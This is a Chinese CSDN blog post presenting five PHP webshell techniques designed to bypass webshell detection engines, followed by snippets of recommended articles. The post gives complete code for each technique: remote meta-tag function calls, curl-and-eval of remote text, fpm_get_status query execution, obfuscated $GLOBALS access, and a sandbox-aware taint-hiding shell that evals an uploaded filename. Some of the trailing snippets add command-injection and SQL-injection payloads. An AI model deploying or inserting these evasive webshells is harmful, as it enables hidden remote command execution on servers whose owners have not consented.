WEB安全--RCE--webshell bypass

最新推荐文章于 2025-04-28 17:27:02 发布
最新推荐文章于 2025-04-28 17:27:02 发布
阅读量713 收藏 16
点赞数 7
分类专栏: rce 文章标签: web安全 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74800552/article/details/147524520
版权

一、get_meta_tags

原理:

用PHP的get_meta_tags()函数获取远程服务器中html页面的meta标签中的值,我们将meta的值设为如下命令执行语句,就能被webshell接收并拼接成

system(whoami);

这样的形式在受害机上执行。

服务器内容:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="a" content="system">
    <meta name="b" content="whoami">
    <title>Document</title>
</head>
<body>
    <div>
        webshell bypass
    </div>
</body>
</html>

webshell:

<?php
get_meta_tags("http://127.0.0.1/rce/bypass.html")["a"](get_meta_tags("http://127.0.0.1/rce/bypass.html")["b"]);

访问webshell执行命令:

二、curl

原理:

使用PHP的curl命令访问远程服务器的txt文件,将文件内容赋值给$output变量,并用

eval($output)

这种方式执行txt文件中的内容system(whoami);实现命令执行。

1.txt:

system(whoami);

webshell:

<?php
$url="http://127.0.0.1/rce/1.txt";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
//curl_setopt($ch,CURLOPT_HTTPHEADER,$headerArray);
$output = curl_exec($ch);
curl_close($ch);
echo $output;
eval($output);
?>

三、fpm_get_status

原理:

fpm_get_status用于获取 PHP-FPM(FastCGI Process Manager)的状态信息。

我们可以在打印fpm_get_status()信息时传参,这样其中的query-string就会接收到我们传递的值

并且在执行的时候可能是不同的进程,也就是你所在的数组可能是数组0也可能是数组1,所以进行for循环,循环出来就可以百分百执行命令

webshell:

<?php
foreach(fpm_get_status()["procs"] as $val){
 system($val["query-string"]);
}

payload:

127.0.0.1/rce/bypass.php?whoami

四、$GLOBALS

原理:

当查杀引擎对$GLOBALS全局变量传参点进行了检测,但是没有严格执行递归检测,就可以通过获取多个$GLOBALS参数干扰检测

然后用[_GET]获取我们URL中传递的命令

由于system会被拦截,所以通过substr(timezone_version_get(),2)的方式获取system

最后通过system执行命令

webshell:

<?php
$m=($GLOBALS[GLOBALS][GLOBALS][GLOBALS][GLOBALS][GLOBALS][GLOBALS][GLOBALS][GLOBALS][GLOBALS
][_GET][b]);
substr(timezone_version_get(),2)($m);

payload:

127.0.0.1/rce/bypass.php?b=whoami



五、隐藏污点

webshell:

<?php
$b = "111";
$c = "222";
if(get_cfg_var('error_reporting')>0){
 $b="#";
}
$a = array( "one"=>$c,"two"=>&$c );
$url = "http://127.0.0.1".$b."?a=1";
$d =parse_url($url);
if($d['query']){
 $c="echo 111;";
}
else{
 $c=$_FILES['useraccount']['name'];
}
var_dump($a["two"]);
eval($a["two"]);
?>

查杀引擎检测代码走的路径:

$b="111" $c="111"

==> $url="http://127.0.0.1/111?a=1"

==> $d['query']="a=1"

==> $c="echo 111"

==> $a[two]="echo 111"

==> eval(echo 111)

实际访问时代码走的路径:

$b="111" $c="111"

==> $url="http://127.0.0.1/#?a=1"

==> $d['query']=NULL

==> $c=$_FILES['useraccount']['name']

==> $a[two]=$_FILES['useraccount']['name']

==> eval($_FILES['useraccount']['name'])


主要原因是这一步get_cfg_var('error_reporting'),当动态查杀引擎没有配置error_reporting这个参数,而真实环境中配置了该参数,那么走向就会截然不同,在上面代码中就会让 $b="#"

$d =parse_url($url)是以数组形式获取url中的各个值,不过当url中有#时,其后面的内容就会被忽略,所以$d['query']=NULL,于是就走到else判断中去了

配合文件上传:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>upload</title>
</head>
<body>
    <form action="bypass.php" method="post" enctype="multipart/form-data">
        <input type="file" name="useraccount">
        <input type="submit" value="upload">
    </form>
</body>
</html>

注意 :<input type="file" name="useraccount">

修改filename字段:system('whoami');

CVE-2023-32315:Openfire管理控制台身份验证绕过到RCE的复现
薛定谔嘚喵博客
09-01 1791
在 4.7.4 和 4.6.7 之前的版本中,发现 Openfire 的管理控制台(管理控制台)是一个基于 Web 的应用程序,容易受到通过设置环境进行的路径遍历攻击。这允许未经身份验证的用户在已配置的 Openfire 环境中使用未经身份验证的 Openfire 设置环境来访问为管理用户保留的 Openfire 管理控制台中的受限页面。
web安全之文件上传学习总结
初岄的博客
01-21 2351
web安全之文件上传学习总结
WEB安全--RCE--disable_function bypass
m0_74800552的博客
04-20 1029
disable_function bypass
web安全---了解文件上传漏洞(建议收藏)
qq_46217803的博客
07-11 515
言归正传,来了解一下什么是文件上传漏洞 注:一般的,我们上传一个一句话木马文件后,我们需要知道文件的位置才能进行一个链接,所以就需要知道文件的回显位置。如果站点使用使用cms(网站内容管理系统)搭建的,则可以上网查询该cms的poc和exp。 如上图所示,就是常用的一个前端效验javasrcipt的一段代码。 以下是俺自己整理的绕过姿势(CTF用的多)这里为了快速的一个了解,就简单的说一下原理,主要还是绕过姿势,都是干货呢!!! .htaccess绕过 绕过姿势payload 这一
WEB渗透Web突破篇-命令注入
qq_59468567的博客
08-04 140
【代码】WEB渗透Web突破篇-命令注入。
WEB渗透Web突破篇-SSRF
qq_59468567的博客
08-03 1541
转码服务 在线翻译 获取超链接的标题等内容进行显示 请求远程服务器资源的地方,图片加载与下载(通过URL地址加载或下载图片) 图片、文章收藏功能 对外发起网络请求的地方,网站采集、网页抓取的地方。 头像 (远程加载头像) 一切要你输入网址的地方和可以输入ip的地方。 数据库内置功能(mongodb的copyDatabase函数) 邮件系统 文件处理 在线处理工具 从URL关键字中寻找:share、wap、url、link、src、source、target、u、3g、display、sourceURl、im
NSSCTF-WEB-easy_eval
m0_52061428的博客
10-16 1452
说是easy,实际很difficult。
[SUCTF 2019]EasyWeb---无参数RCE
高高同学
08-19 700
SUCTF 2019]EasyWeb 考点: 无数字字母shell 利用.htaccess上传文件 绕过open_basedir 源码审计 <?php function get_the_flag(){ // web admin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); //命名格式(upload/tmp_md5(ip)
网络安全-webshell详解(原理、攻击、检测与防御)
热门推荐
关注网络安全、云原生安全
09-14 7万+
简介 原理 攻击 WebShell管理工具 Cknife中国菜刀 antSword中国蚁剑 冰蝎动态二进制加密网站管理客户端 weevely3Weaponized web shell Altmanthe cross platform webshell tool in .NET Webshell SniperManage your website via terminal quasibotcomplex webshell manager, quasi-http botne...
CTFshow-WEB入门-命令执行
feng的博客
01-20 1万+
web29 ?c=system("cat fla*.php"); 或者 连蚁剑得flag。 web30 或者其他姿势,因为过滤太少,命令执行得函数很多,绕过姿势也很多,因此不列举了。 web31 或者 ?c=echo`tac%09fl*`; web32 利用自己以前没有注意过得一个点。 if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){ 过滤了括号和分号确实有些难受。过滤了括号只能用无括号的
渗透测试--攻击常见的Web应用
weixin_44368093的博客
01-21 979
胖客户端其实就是一些类似于APP的应用程序,胖客户端在本地承担了很多逻辑和运行判断以减轻服务器的负担,所以我们可以通过逆向了解本地代码的很多逻辑从而找到漏洞或硬编码凭证。本部分仅引用了HacktheBox里面的部分内容,主要是介绍了可以使用的工具,因为逆向的精髓并不在此,且俺也不会逆向所以我也就不多讲了。感兴趣的可以去AboutStringsGhidraIDAOllyDbgRadare2dnSpyx64dbgJADXFridaWiresharktcpdumpTCPViewBurp Suite。
【ctfshow】web-SQL注入 wp
孤桜懶契
08-21 4707
前言 记录web的题目wp,慢慢变强,铸剑。 SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; GET传参会自己解码,注释可以用%23(#), --空格,–+等,或者拼接语句不用注释也行 判断有3个字段
CVE-2018-19518复现 imap_open()
heySister
03-22 2985
CVE-2018-19518 前几天时候无聊翻了一下安恒杯2月的月赛题目,看到有一道是用了跟imap_open()这个函数有关的webshell,去查了一下,发现是个CVE。emm…刚开始查到的是freebuf上面的一个文章,还有另外一个一模一样的,也不知道是谁抄谁,还是都是翻译的国外的
Python安全攻防-3渗透测试框架
快吃小蛋糕吧的博客
11-23 2283
最近新买了一本关于Python的一本书《Python安全攻防渗透测试实战指南》,这本书出自MS08067安全实验室,才学到第三章,虽然书中有非常多的低级语法错误,但是总体来讲还是值得一学的。 Pocsuite框架: 这里书中有对Pocsuite框架有基本的介绍,这里就不重复了,只需要知道这是一款基于漏洞与POC的远程漏洞验证框架即可。 安装: 通过git克隆代码仓库 git clone https://github.com/knownsec/pocsuite3.git 克隆完成后,仓库结构大概是这样的.
网络安全零基础培训 L1-3 Kali命令基础
2401_86544210的博客
04-17 1390
Nmap(端口扫描器)Wireshark(数据包分析器)(应用于对无线局域网进行渗透测试的软件)(密码破解器)Nessus(很强大的漏洞扫描工具)OpenVAS(开源的漏洞扫描工具)Burp Suite(用于web应用安全测试的集成平台)SQLmap自动化的SQL注入工具wireshark网络协议分析工具(kali预装的这些软件包含了很多黑客会使用到的很多工具,但是不要用这些工具去私自攻击未授权的一些网站)
IEEE会议:第十届网络安全与信息工程国际会议(ICCSIE 2025)
最新发布
iaast的博客
04-28 333
2025西部信息工程与技术学术论坛暨第十届网络安全与信息工程国际会议(10th International Conference on Cyber Security and Information Engineering)将于7月23-25日西宁召开。本届会议由北京工业大学、青海理工学院主办,浙江工业大学协办,IEEE计算机学会(IEEE Computer Society)技术赞助。
安恒web安全春招实战
persist213的博客
04-24 1429
以下是一份涵盖XSS/SSRF漏洞场景复现与绕过技术的模拟面试题目及参考答案,分三个维度:基础原理与防御机制、实战场景复现和高级绕过思路。《网安面试指南》5000篇网安资料库。
【杂谈】-人工智能驱动的网络安全威胁:新一代网络钓鱼
视觉与物联智能
04-28 591
网络安全领域,人工智能(AI)引发的网络威胁正对全球个人和组织构成重大风险。传统网络钓鱼攻击因AI工具的滥用不断升级,其频率、复杂性和隐蔽性逐年攀升。其中,**AI语音钓鱼(Vishing)**因其技术先进性和高欺骗性,成为最值得关注的新型攻击手段。
网络准入控制系统:2025年网络安全的坚固防线
Synfuture的博客
04-25 261
客户端软件安装在需要接入网络的终端设备上,负责收集设备的各类信息,依据预先设定的控制策略对客户端提交的信息进行评估。不同身份所能访问的资源是不同的。阳途网络准入控制系统是现代网络安全体系中的重要组成部分,守护着网络空间的信息安全与稳定运行,在各个领域都发挥着不可或缺的关键作用,并将持续随着技术的发展而不断优化完善。在多分支结构的企业或大型组织中,阳途网络准入控制系统还能实现统一管理,只要其设备接入网络,都将受到统一的安全准入标准约束,避免因各地安全标准不一致而产生的安全漏洞。
CTFHUB----web前置技能-rce
01-01
### CTFHUB Web 前置技能 RCE 挑战及解题思路 #### 远程命令执行简介 远程命令执行(Remote Command Execution, RCE),是指攻击者能够通过应用程序接口发送特定指令,在服务器端执行任意操作系统级别的命令。这种漏洞一旦被利用,可能导致整个系统的完全控制。 #### 发现潜在的RCE漏洞 当面对可能存在RCE漏洞的应用程序时,通常会寻找可以输入数据的地方,比如表单提交、URL参数等位置。如果这些地方的数据未经严格验证就直接用于构建并执行系统调用,则可能成为RCE攻击的目标[^1]。 #### 验证是否存在RCE漏洞 为了确认是否真的存在这样的安全风险,可以通过尝试注入一些简单的测试语句来观察响应情况。例如,在支持PHP环境的情况下,可以试着向目标页面传递如下payload: ```php <?php phpinfo(); ?> ``` 如果上述代码被执行并且返回了PHP配置信息,则说明确实存在未受保护的入口点允许外部传入的内容影响到内部逻辑处理流程。 #### 利用已知条件构造有效载荷 假设经过初步探测之后发现了某个变量可以直接参与到shell_exec()函数之中去,那么就可以精心设计一段能实现预期目的同时又不会引起怀疑的日志记录脚本作为最终的有效负载。这里给出一个简单例子用来获取当前目录下的文件列表: ```bash ls -al ``` 当然实际操作过程中还需要考虑更多因素,如编码方式转换、特殊字符转义等问题以确保成功绕过防护机制达到想要的效果。 #### 安全建议 对于开发者而言,预防此类问题的发生至关重要。应当遵循最小权限原则分配资源访问权;对所有来自客户端的信息都应做充分校验过滤后再参与后续运算过程;定期审查源码查找安全隐患及时修复补丁版本更新至最新状态等等措施均有助于减少遭受恶意侵害的可能性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值